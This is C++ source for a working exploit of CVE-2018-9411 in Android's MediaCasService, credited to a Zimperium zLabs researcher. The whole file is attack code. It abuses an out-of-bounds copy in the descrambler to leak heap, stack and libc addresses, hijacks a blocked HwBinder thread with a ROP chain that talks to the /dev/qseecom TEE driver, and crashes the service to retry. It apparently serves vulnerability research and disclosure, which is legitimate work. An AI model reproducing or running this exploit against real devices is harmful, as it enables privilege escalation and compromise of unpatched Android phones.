README.md
Rendering markdown...
//
// CVE-2018-9411 exploit for MediaCasService
// Author: Tamir Zahavi-Brunner (@tamir_zb) of Zimperium zLabs Team
//
#include <utils/StrongPointer.h>
#include <binder/MemoryHeapBase.h>
#include <android/hardware/cas/1.0/IMediaCasService.h>
#include <android/hardware/cas/1.0/ICas.h>
#include <android/hardware/cas/1.0/ICasListener.h>
#include <android/hardware/cas/native/1.0/IDescrambler.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include "qseecom.h"
#include "offsets.h"
#include "defs.h"
using ::android::sp;
using ::android::MemoryHeapBase;
using ::android::hardware::hidl_vec;
using ::android::hardware::hidl_memory;
using ::android::hardware::hidl_handle;
using ::android::hardware::hidl_string;
using ::android::hardware::Return;
using ::android::hardware::Void;
using namespace android::hardware::cas::V1_0;
using namespace android::hardware::cas::native::V1_0;
// Global variables relevant for most of the exploit.
static sp<ICas> cas;
static sp<IDescrambler> descrambler;
static pthread_barrier_t barrier;
// A listener that upon receiving an event, waits on the pthread barrier before
// returning. This causes a remote HwBinder thread to be blocked in a known
// state (waiting for the onEvent response) until the wait for the barrier is
// over.
class CasListener : public ICasListener {
virtual Return<void> onEvent(int32_t, int32_t, const hidl_vec<uint8_t>&) {
pthread_barrier_wait(&barrier);
return Void();
}
};
// Prepare a valid descrambler object to be used in the exploit.
// Based on AOSP's MediaCasTest.java
static bool prepare_descrambler() {
sp<IMediaCasService> service = IMediaCasService::getService();
if (service == NULL) {
return false;
}
static sp<ICasListener> listener = new CasListener();
cas = service->createPlugin(CLEARKEY_SYSTEMID, listener);
descrambler = IDescrambler::castFrom(
service->createDescrambler(CLEARKEY_SYSTEMID));
if (cas->provision(provision_str) != Status::OK) {
return false;
}
Status opensession_status;
hidl_vec<uint8_t> descrambler_session;
cas->openSession([&](Status status, const hidl_vec<uint8_t>& session_id) {
opensession_status = status;
descrambler_session = session_id;
});
if (opensession_status != Status::OK) {
return false;
}
if (descrambler->setMediaCasSession(descrambler_session) != Status::OK) {
return false;
}
return true;
}
// Simply send an event in order to receive it in CasListener.
static void *event_thread(void *) {
hidl_vec<uint8_t> vec;
cas->sendEvent(0, 0, vec);
return NULL;
}
// Prepare remote threads, all blocked in the same known state (waiting for the
// onEvent response).
static bool prepare_threads() {
if (pthread_barrier_init(&barrier, NULL, THREADS_NUM + 1) != 0) {
return false;
}
static pthread_t threads[THREADS_NUM];
for (size_t i = 0; i < THREADS_NUM; i++) {
if (pthread_create(threads + i, NULL, event_thread, NULL) != 0) {
return false;
}
}
// Wait for all the remote threads to reach the blocked state.
usleep(500000);
return true;
}
// Let all the remote blocked threads run.
static void unblock_threads() {
pthread_barrier_wait(&barrier);
pthread_barrier_destroy(&barrier);
}
// Run the descramble vulnerability in order to perform out of bounds copy.
static bool run_descramble_vuln(sp<MemoryHeapBase>& heap,
uint32_t src_offset, uint32_t dst_offset, uint32_t copy_size) {
native_handle_t* handle = native_handle_create(1, 0);
handle->data[0] = heap->getHeapID();
SharedBuffer src;
src.offset = 0;
// 0x100000000 would allow access to the entire 32 bit address range.
src.size = 0x100000000;
// 0x100000000 + heap size will be treated as the size of the shared memory
// when performing checks, but when running mmap the number would be
// treated as 32 bit and not 64, so the actual size will be just the heap
// size.
src.heapBase = hidl_memory("ashmem", hidl_handle(handle),
0x100000000 + heap->getSize());
DestinationBuffer dst;
dst.type = BufferType::SHARED_MEMORY;
dst.nonsecureMemory = src;
hidl_vec<SubSample> subsamples;
SubSample subsample_arr[] = {{ .numBytesOfClearData = copy_size,
.numBytesOfEncryptedData = 0 }};
subsamples.setToExternal(subsample_arr, 1);
Status descramble_status;
Return<void> descramble_result = descrambler->descramble(
ScramblingControl::UNSCRAMBLED, subsamples, src, src_offset, dst,
dst_offset,
[&] (Status status, uint32_t, const hidl_string&) {
descramble_status = status;
});
native_handle_delete(handle);
return (descramble_result.isOk() && descramble_status == Status::OK);
}
// Crash the service, which will cause it to restart. The crash is by writing
// to a known unmapped address, in order to differentiate this planned crash
// from possible other unplanned crashes.
static void crash_service(sp<MemoryHeapBase>& small_heap,
uint32_t small_heap_addr) {
run_descramble_vuln(small_heap, 0, CRASH_ADDR - small_heap_addr, 1);
}
// We utilize the fact that the linker leaves data indicating its address in
// order to determine the address that the small heap is mapped at.
static bool find_small_heap_addr(sp<MemoryHeapBase>& small_heap,
uint32_t *addr) {
if (!run_descramble_vuln(small_heap, PAGE_SIZE + LINKER_ADDR_OFFSET, 0,
sizeof(*addr))) {
return false;
}
*addr = *(uint32_t *)small_heap->getBase() -
LINKER_ADDR_SMALL_HEAP_ADDR_OFFSET;
return true;
}
// Try to have our shared memory mapped directly above threads stacks, then
// read data from a stack of a thread blocked on an onEvent call, which will be
// our target thread.
static bool find_target_thread(sp<MemoryHeapBase>& large_heap,
uint32_t *stack_addr, uint32_t *libc_addr) {
// 4 = our own shared memory + 3 stacks in order to find a stack of a
// thread which is in the (blocked) state we want it to be. Top stacks
// would most likely be the threads currently parsing our request.
uint32_t read_offset = STACK_SIZE * 4;
read_offset += START_THREAD_OFFSET;
uint32_t copy_size = STACK_BASE_OFFSET - START_THREAD_OFFSET +
sizeof(*stack_addr);
if (!run_descramble_vuln(large_heap, read_offset, 0, copy_size)) {
return false;
}
uint8_t *large_heap_data = (uint8_t *)large_heap->getBase();
// In order to find the address the stack is mapped in we find pthread's
// pthread_internal_t struct in the bottom and read its "attr.stack_base".
uint32_t stack_map = *(uint32_t *)(large_heap_data + STACK_BASE_OFFSET -
START_THREAD_OFFSET);
// In order to find libc, we use an address on the stack which is to a
// location inside libc's __start_thread.
uint32_t start_thread = *(uint32_t *)(large_heap_data);
// If our shared memory wasn't mapped directly over the threads stacks then
// at least one of these would most likely be 0.
if (start_thread == 0 || stack_map == 0) {
return false;
}
// Skip the guard page at the beginning of the stack.
*stack_addr = stack_map + PAGE_SIZE;
*libc_addr = start_thread - START_THREAD_LIBC_OFFSET;
return true;
}
// Overwrite the target thread's stack with our ROP stack.
static bool write_rop(sp<MemoryHeapBase>& small_heap, uint32_t stack_addr,
uint32_t libc_addr, uint32_t small_heap_addr) {
// This ROP chain performs the following code:
//
// int fd = open("/dev/qseecom", 0);
// ioctl(fd, QSEECOM_IOCTL_GET_QSEOS_VERSION_REQ, stack_addr);
// sleep(0xffffffff);
//
// This ROP chain demonstrates how the exploit performs communication with
// the TEE device driver by getting the QSEOS version. The sleep at the end
// allows us to read the result (otherwise the target thread would crash
// immediately after running the ROP chain).
uint32_t *rop = (uint32_t *)small_heap->getBase();
size_t i = 0;
rop[i++] = libc_addr + POP_R0_R1_PC; // pc = pop {r0, r1, pc}
rop[i++] = UNUSED_REGISTER; // r0
rop[i++] = libc_addr + POP_R0_R1_PC; // r1 = pop {r0, r1, pc}
rop[i++] = libc_addr + BLX_R1_POP_R7_PC; // pc = blx r1; pop {r7, pc}
rop[i++] = stack_addr; // r0 = "/dev/qseecom"
rop[i++] = 0; // r1 = 0
rop[i++] = libc_addr + OPEN_2_OFFSET; // pc = __open_2
rop[i++] = UNUSED_REGISTER; // r7
rop[i++] = libc_addr + POP_R1_R2_PC; // pc = pop {r1, r2, pc}
rop[i++] = libc_addr + POP_R1_R2_PC; // r1 = pop {r1, r2, pc}
rop[i++] = UNUSED_REGISTER; // r2
rop[i++] = libc_addr + BLX_R1_POP_R7_PC; // pc = blx r1; pop {r7, pc}
rop[i++] = QSEECOM_IOCTL_GET_QSEOS_VERSION_REQ; // r1
rop[i++] = stack_addr; // r2 = stack_addr
rop[i++] = libc_addr + IOCTL_OFFSET; // pc = ioctl
rop[i++] = UNUSED_REGISTER; // r7
rop[i++] = libc_addr + POP_R0_PC; // pc = pop {r0, pc}
rop[i++] = 0xffffffff; // r0 = 0xffffffff
rop[i++] = libc_addr + SLEEP_OFFSET; // pc = sleep
// The ROP stack begins by overwriting a return address in the blocked
// thread.
return run_descramble_vuln(small_heap, 0,
stack_addr + WAIT_FOR_RESPONSE_RA_OFFSET - small_heap_addr,
sizeof(*rop) * i);
}
int main(int, char **argv) {
// We use a small gap that the linker leaves in order to have a
// deterministic location for the shared memory to be mapped at. The gap is
// so small that usually nothing else gets mapped there. The small heap is
// a single page in order to always be mapped in that gap.
sp<MemoryHeapBase> small_heap = new MemoryHeapBase(PAGE_SIZE);
// Use a relatively large shared memory (stack size is large enough) in
// order to try and be mapped directly above threads stacks.
sp<MemoryHeapBase> large_heap = new MemoryHeapBase(STACK_SIZE);
uint32_t small_heap_addr, stack_addr, libc_addr;
if (!prepare_descrambler()) {
fprintf(stderr, "[-] Failed to prepare the descrambler object\n");
return -1;
}
printf("[+] Prepared descrambler object\n");
if (!find_small_heap_addr(small_heap, &small_heap_addr)) {
fprintf(stderr, "[-] Failed to find small heap address\n");
return -1;
}
printf("[+] Determined small heap address (address = 0x%08x)\n",
small_heap_addr);
if (!prepare_threads()) {
fprintf(stderr, "[-] Failed to prepare the remote threads\n");
return -1;
}
printf("[+] Prepared remote threads\n");
if (!find_target_thread(large_heap, &stack_addr, &libc_addr)) {
// This is the most unreliable part of the exploit. Other things
// (like the jemalloc heap) could easily get mapped between us and
// the threads stacks. So in case something like that happens we
// crash the service in order for it to restart and then try again.
fprintf(stderr, "[-] Failed to find target thread, crashing service "
"and retrying...\n\n");
crash_service(small_heap, small_heap_addr);
// Dirty restart, better code would reset the resources and try again.
execv(argv[0], argv);
}
printf("[+] Found target thread (stack address = 0x%08x, libc address = "
"0x%08x)\n", stack_addr, libc_addr);
// The offset to the target thread stack from the small heap.
uint32_t stack_addr_offset = stack_addr - small_heap_addr;
// Copy data for the ROP chain to the top of the stack (writable location
// that won't get overwritten).
char dev_qseecom[] = "/dev/qseecom";
strcpy((char *)small_heap->getBase(), dev_qseecom);
if (!run_descramble_vuln(small_heap, 0, stack_addr_offset,
sizeof(dev_qseecom))) {
fprintf(stderr, "[-] Failed to copy data for the ROP chain\n");
return -1;
}
printf("[+] Copied data for ROP chain\n");
if (!write_rop(small_heap, stack_addr, libc_addr, small_heap_addr)) {
fprintf(stderr, "[-] Failed to write ROP stack\n");
return -1;
}
printf("[+] ROP stack written\n");
printf("[+] Running ROP chain...\n");
unblock_threads();
// Wait for the target thread to run the ROP chain.
usleep(500000);
// Copy back the result - QSEOS version.
if (!run_descramble_vuln(small_heap, stack_addr_offset, 0,
sizeof(uint32_t))) {
fprintf(stderr, "[-] Failed to copy QSEOS version\n");
return -1;
}
uint32_t qseos_version = *(uint32_t *)small_heap->getBase();
printf("[+] QSEOS version = 0x%x\n", qseos_version);
// Clear everything by crashing the service and letting it restart.
crash_service(small_heap, small_heap_addr);
return 0;
}